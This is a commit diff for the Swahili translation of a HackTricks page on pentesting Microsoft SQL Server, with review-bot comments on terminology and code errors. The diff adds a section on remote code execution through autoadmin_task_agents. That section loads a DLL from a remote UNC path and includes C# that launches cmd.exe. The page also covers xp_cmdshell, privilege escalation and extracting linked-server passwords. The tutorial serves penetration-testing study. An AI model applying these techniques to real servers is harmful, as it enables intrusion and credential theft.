Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

Translator 2024-11-22 11:21:00 +00:00
parent 141acc4f39
commit cee35ff114


@ -1,15 +1,15 @@
# 1433 - Pentesting MSSQL - Microsoft SQL Server
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
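Review bot: the banner lines now load the images from `../../.gitbook/assets/` instead of the site-absolute `/.gitbook/assets/`, which only resolves if this page lives two directories below the repository root; the other relative links on the page (`../../generic-methodologies-and-resources/brute-force.md`, `../../pentesting-web/sql-injection/...`) use the same depth, and the footer banner in the last hunk receives the same change, so the two copies stay consistent. Unescaping `hacktricks\_live` to `hacktricks_live` inside the URL is correct; the `\_` in the link text is still needed to stop markdown reading the underscore as emphasis.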
@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## Basic Information
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
> **Microsoft SQL Server** ni **mfumo wa usimamizi wa hifadhidata** wa uhusiano ulioendelezwa na Microsoft. Kama seva ya hifadhidata, ni bidhaa ya programu yenye kazi kuu ya kuhifadhi na kupata data kama inavyohitajika na programu nyingine za programu—ambazo zinaweza kukimbia kwenye kompyuta hiyo hiyo au kwenye kompyuta nyingine kupitia mtandao (ikiwemo Intaneti).\\
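Review bot: the translated Wikipedia quote still ends with `\\`, which markdown renders as a literal backslash at the end of the blockquote rather than the hard line break that a single trailing `\` gives (the banner lines above use the single form); drop one backslash or end the line without it.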
@ -29,8 +29,8 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
* **master Database**: Hii database ni muhimu kwani inachukua maelezo yote ya kiwango cha mfumo kwa mfano wa SQL Server.
* **msdb Database**: SQL Server Agent inatumia hii database kusimamia ratiba za arifa na kazi.
* **model Database**: Inatumika kama mpango wa kila database mpya kwenye mfano wa SQL Server, ambapo mabadiliko yoyote kama ukubwa, collation, mfano wa urejeleaji, na mengineyo yanaakisiwa katika databases mpya zinazoundwa.
* **Resource Database**: Hii ni database ya kusoma tu ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vinahifadhiwa kimwili katika database ya Resource, vinawasilishwa kimaadili katika schema ya sys ya kila database.
* **model Database**: Inatumika kama mfano kwa kila database mpya kwenye mfano wa SQL Server, ambapo mabadiliko yoyote kama ukubwa, collation, mfano wa urejeleaji, na mengineyo yanaakisiwa katika databases mpya zinazoundwa.
* **Resource Database**: Database isiyo na uwezo wa kuandikwa ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vinahifadhiwa kimwili katika database ya Resource, vinawasilishwa kimaadili katika schema ya sys ya kila database.
* **tempdb Database**: Inatumika kama eneo la kuhifadhi la muda kwa vitu vya muda au seti za matokeo za kati.
## Enumeration
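Review bot: in the reworded model-database bullet, `mfano` is now used twice with two meanings in one sentence ("kama mfano kwa kila database mpya kwenye mfano wa SQL Server": template, then instance), which reads ambiguously; use `kiolezo` for template, or keep the English terms `template` and `instance`, as the page already does for `collation` and `schema`.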
@ -43,10 +43,10 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
Ikiwa **huna** **vithibitisho** unaweza kujaribu kuvihisi. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
Ikiwa **huna** **akikazi** unaweza kujaribu kuyakisia. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
{% endhint %}
#### Metasploit (inahitaji vithibitisho)
#### Metasploit (inahitaji akiba)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
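Review bot: "credentials" is rendered two different ways inside this hunk, `akikazi` in the hint and `akiba` in the Metasploit heading, and `akiba` ordinarily means savings or a reserve; pick one term for both lines, either the previous `vithibitisho` or the untranslated `credentials`, since the page leaves neighbouring SQL Server terms such as `logins` and `sysadmin` in English.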
@ -80,11 +80,10 @@ msf> use windows/manage/mssql_local_auth_bypass
```
### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server)
### Uhesabu wa Mikono
### Uhesabuaji wa Mikono
#### Ingia
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
@ -171,13 +170,13 @@ SELECT * FROM sysusers
#### Pata Ruhusa
1. **Securable:** Imefafanuliwa kama rasilimali zinazodhibitiwa na SQL Server kwa udhibiti wa ufikiaji. Hizi zimeainishwa katika:
* **Server** Mifano ni pamoja na databases, logins, endpoints, availability groups, na server roles.
* **Database** Mifano inajumuisha database role, application roles, schema, certificates, full text catalogs, na watumiaji.
* **Schema** Inajumuisha tables, views, procedures, functions, synonyms, nk.
2. **Permission:** Inahusishwa na SQL Server securables, ruhusa kama ALTER, CONTROL, na CREATE zinaweza kutolewa kwa principal. Usimamizi wa ruhusa unafanyika katika ngazi mbili:
* **Server** Mifano ni pamoja na databases, logins, endpoints, makundi ya upatikanaji, na majukumu ya server.
* **Database** Mifano inajumuisha jukumu la database, majukumu ya programu, schema, vyeti, katalogi za maandiko kamili, na watumiaji.
* **Schema** Inajumuisha meza, maoni, taratibu, kazi, majina sawa, n.k.
2. **Permission:** Inahusishwa na securables za SQL Server, ruhusa kama ALTER, CONTROL, na CREATE zinaweza kutolewa kwa principal. Usimamizi wa ruhusa unafanyika katika ngazi mbili:
* **Server Level** kwa kutumia logins
* **Database Level** kwa kutumia watumiaji
3. **Principal:** Neno hili linarejelea chombo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika roles zilizo na haki za ufikiaji.
3. **Principal:** Neno hili linarejelea chombo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika majukumu yaliyo na haki za ufikiaji.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
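Review bot: the new wording translates SQL Server object-type names that the rest of the hunk keeps in English: `makundi ya upatikanaji` for availability groups, `meza` for tables, `maoni` (opinions) for views, `taratibu` for procedures, `kazi` for functions and `majina sawa` for synonyms, while `logins`, `endpoints`, `schema`, `certificates` and `principal` stay as-is. Keep the object names in English so they match what a reader sees in `sys.fn_builtin_permissions` output and in the documentation. Separately, the `sql` fence that follows opens with `# Show all different securables names`; `#` is not a comment marker in T-SQL, so the line errors if pasted as written, and the same `#` comments appear in the `sql` fences further down (`# Get owners of databases`, `# Find users you can impersonate`); the `-- Impersonate RegUser` line later in the diff shows the correct form.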
@ -202,7 +201,7 @@ EXEC sp_helprotect 'xp_cmdshell'
### Execute OS Commands
{% hint style="danger" %}
Kumbuka kwamba ili uweze kutekeleza amri si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **ruhusa ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
Kumbuka kwamba ili uweze kutekeleza amri si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **idhini ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
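Review bot: the hint now says `idhini ya EXECUTE` whereas every other mention of permissions on the page, including the Permissions list in the previous hunk, uses `ruhusa`; keep one term. Also `utaratibu wa kuhifadhi` is a literal rendering of "storage procedure", and the page elsewhere leaves `stored procedures` untranslated, so `stored procedure` should stay in English here as well.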
@ -321,7 +320,7 @@ EXECUTE sp_OADestroy @OLE
```
### **Soma faili na** OPENROWSET
Kwa default, `MSSQL` inaruhusu kusoma faili **katika faili yoyote kwenye mfumo wa uendeshaji ambayo akaunti ina ruhusa ya kusoma**. Tunaweza kutumia swali la SQL lifuatalo:
Kwa default, `MSSQL` inaruhusu kusoma faili **katika faili yoyote kwenye mfumo wa uendeshaji ambayo akaunti ina ruhusa ya kusoma**. Tunaweza kutumia query ya SQL ifuatayo:
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
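Review bot: the reworded sentence keeps the phrase `kusoma faili katika faili yoyote` ("read files in any file"), which is garbled; the intended meaning, reading any file on the operating system that the service account has read access to, would be `kusoma faili yoyote kwenye mfumo wa uendeshaji ambayo akaunti ina ruhusa ya kusoma`. Swapping `swali la SQL` for `query ya SQL` is fine and matches how the rest of the page treats SQL terms.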
@ -381,23 +380,83 @@ Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```
For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
Kwa **mfano zaidi** angalia [**chanzo asilia**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
### RCE with MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
### RCE na MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
Ni **uwezekano wa kupakia .NET dll ndani ya MSSQL kwa kutumia kazi za kawaida**. Hata hivyo, **inahitaji `dbo` ufikiaji** hivyo unahitaji muunganisho na database **kama `sa` au jukumu la Msimamizi**.
Inawezekana **kuchaji .NET dll ndani ya MSSQL kwa kutumia kazi za kawaida**. Hata hivyo, **hii inahitaji `dbo` ufikiaji** hivyo unahitaji muunganisho na database **kama `sa` au jukumu la Msimamizi**.
[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example.
[**Fuata kiungo hiki**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) kuona mfano.
### Other ways for RCE
### RCE na `autoadmin_task_agents`
Kulingana[ **na chapisho hili**](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp), pia inawezekana kuchaji dll ya mbali na kufanya MSSQL iite kwa kutumia kitu kama:
{% code overflow="wrap" %}
```sql
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
```
{% endcode %}
Pamoja na:
```csharp
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;
namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}
public override void DoWork()
{
}
public override void ExternalJob(string command, LogBaseService jobLogger)
{
}
public override void Start(IServicesFactory services)
{
}
public override void Stop()
{
}
public void Test()
{
}
}
}
```
### Njia Nyingine za RCE
Kuna njia nyingine za kupata utekelezaji wa amri, kama kuongeza [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), na [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
## MSSQL Privilege Escalation
## Kuinua Haki za MSSQL
### From db\_owner to sysadmin
### Kutoka db\_owner hadi sysadmin
Ikiwa **mtumiaji wa kawaida** amepewa jukumu **`db_owner`** juu ya **database inayomilikiwa na mtumiaji wa admin** (kama **`sa`**) na database hiyo imewekwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia haki hizi kwa **privesc** kwa sababu **stored procedures** zilizoundwa huko zinaweza **kutekelezwa** kama mmiliki (**admin**).
Ikiwa **mtumiaji wa kawaida** amepewa jukumu la **`db_owner`** juu ya **database inayomilikiwa na mtumiaji wa admin** (kama **`sa`**) na database hiyo imewekwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia haki hizi vibaya ili **privesc** kwa sababu **stored procedures** zilizoundwa huko zinaweza **kutekelezwa** kama mmiliki (**admin**).
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
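Review bot: the `update` statement in the new `autoadmin_task_agents` section quotes its values with double quotes, which T-SQL treats as identifiers under the `QUOTED_IDENTIFIER ON` setting most client connections use, so it fails as written; T-SQL string literals are single-quoted, and the UNC path has doubled separators (`\\remote-server\\ping.dll`). The table is referenced without a database or schema, and unlike the SQLHttp section directly above, which states that `dbo` access via `sa` or an Administrator role is required, this section never says which privileges are needed to modify that table, which is the first thing a reader, or a defender deciding whether to audit writes to it, needs to know. The source is cited through a `translate.goog` proxy URL (here and in the reference list at the end of the diff); cite the original post directly. Finally, translating the `MSSQL Privilege Escalation` and `From db_owner to sysadmin` headings changes their generated anchors, while the SQLHttp heading keeps an explicit `<a id>` for exactly this reason; give those two headings the same treatment or check that no other page links to the old anchors.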
@ -443,7 +502,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
```
### Uwakilishi wa watumiaji wengine
SQL Server ina ruhusa maalum, inayoitwa **`IMPERSONATE`**, ambayo **inawaruhusu watumiaji wanaotekeleza kuchukua ruhusa za mtumiaji mwingine** au kuingia hadi muktadha urejelewe au kikao kikome.
SQL Server ina ruhusa maalum, inayoitwa **`IMPERSONATE`**, ambayo **inawaruhusu mtumiaji anayetekeleza kuchukua ruhusa za mtumiaji mwingine** au kuingia hadi muktadha urejelewe au kikao kikome.
```sql
# Find users you can impersonate
SELECT distinct b.name
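Review bot: `ruhusa za mtumiaji mwingine au kuingia` renders "login" as the verb "to log in", but in this sentence login is the SQL Server login principal (what `EXECUTE AS LOGIN` targets in the next hunk), so it should read `... za mtumiaji mwingine au login mwingine`, keeping `login` as the page does in the Permissions section. The change from plural to singular `mtumiaji anayetekeleza` is correct.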
@ -467,7 +526,7 @@ use_link [NAME]
Ikiwa unaweza kujifanya kuwa mtumiaji, hata kama si sysadmin, unapaswa kuangalia i**f the user has access** kwa **databases** nyingine au seva zilizounganishwa.
{% endhint %}
Kumbuka kwamba mara tu unapo kuwa sysadmin unaweza kujifanya kuwa mtu mwingine yeyote:
Kumbuka kwamba mara tu unapo kuwa sysadmin unaweza kujifanya kuwa yeyote mwingine:
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
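Review bot: the hint line `unapaswa kuangalia i**f the user has access** kwa` is left half-translated, with a bold marker splitting the English word `if`; it should read along the lines of `unapaswa kuangalia **ikiwa mtumiaji ana ufikiaji** kwa databases nyingine au seva zilizounganishwa`. The reworded `yeyote mwingine` line is fine.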
@ -481,7 +540,7 @@ Unaweza kufanya shambulio hili kwa kutumia moduli ya **metasploit**:
```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```
au kwa kutumia **PS** script:
au kwa script ya **PS**:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
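Review bot: `Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1` is missing the path separator after the dot (a `.\` prefix that was probably lost when the backslash was escaped), so PowerShell looks for a module named `.Invoke-SqlServer-Escalate-ExecuteAs.psm1` instead of the file in the current directory; it should be `.\Invoke-SqlServer-Escalate-ExecuteAs.psm1`, the filename given in the raw URL on the line above.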
@ -493,14 +552,14 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
## Kutolewa kwa nywila kutoka kwa SQL Server Linked Servers
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata ushawishi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract_linked_server_passwords)
Baadhi ya mahitaji, na usanidi lazima yafanyike ili exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na haki za Administrator kwenye mashine, au uwezo wa kusimamia Usanidi wa SQL Server.
Baadhi ya mahitaji, na usanidi lazima yafanywe ili exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na haki za Administrator kwenye mashine, au uwezo wa kusimamia Usanidi wa SQL Server.
Baada ya kuthibitisha ruhusa zako, unahitaji kusanidi mambo matatu, ambayo ni yafuatayo:
1. Wezesha TCP/IP kwenye SQL Server instances;
2. Ongeza parameter ya Kuanzisha, katika kesi hii, bendera ya trace itaongezwa, ambayo ni -T7806.
2. Ongeza parameter ya Kuanzisha, katika kesi hii, bendera ya kufuatilia itaongezwa, ambayo ni -T7806.
3. Wezesha muunganisho wa usimamizi wa mbali.
Ili kujiandaa kwa usanidi huu, [hii hazina](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ina skripti zinazohitajika. Mbali na kuwa na skripti ya powershell kwa kila hatua ya usanidi, hazina pia ina skripti kamili ambayo inachanganya skripti za usanidi na utoaji na ufichuzi wa nywila.
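Review bot: `bendera ya kufuatilia` translates the term "trace flag" literally; `-T7806` is documented under the name trace flag, and the surrounding hunk already keeps `TCP/IP`, `instances` and `exploit` in English, so keep `trace flag` so the reader can look the setting up. The `\_` unescaping in the richardswinbank.net URL is correct.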
@ -511,8 +570,8 @@ Kwa maelezo zaidi, rejelea viungo vifuatavyo kuhusu shambulio hili: [Kufichua Ny
## Kuinua Haki za Mlokole
Mtumiaji anayekimbia MSSQL server atakuwa amewezesha token ya haki **SeImpersonatePrivilege.**\
Huenda ukawa na uwezo wa **kuinua hadi kwa Msimamizi** ukifuatia moja ya hizi kurasa 2:
Mtumiaji anayekimbia MSSQL server atakuwa amewezesha tokeni ya haki **SeImpersonatePrivilege.**\
Huenda ukawa na uwezo wa **kuinua hadi kwa Administrator** ukifuatia moja ya hizi kurasa 2:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
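Review bot: this hunk changes `Msimamizi` to `Administrator` for the Windows account you escalate to, but the SQLHttp hunk earlier in this same commit still says `jukumu la Msimamizi` for the SQL Server admin role; if the intent is to keep Windows and SQL Server role names in English, apply it consistently, otherwise the two renderings of the same word will confuse readers.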
@ -536,6 +595,7 @@ Huenda ukawa na uwezo wa **kuinua hadi kwa Msimamizi** ukifuatia moja ya hizi ku
* [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
* [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
* [https://exploit7-tr.translate.goog/posts/sqlserver/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=en&\_x\_tr\_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
## HackTricks Amri za Otomatiki
```
@ -594,15 +654,15 @@ Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {I
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>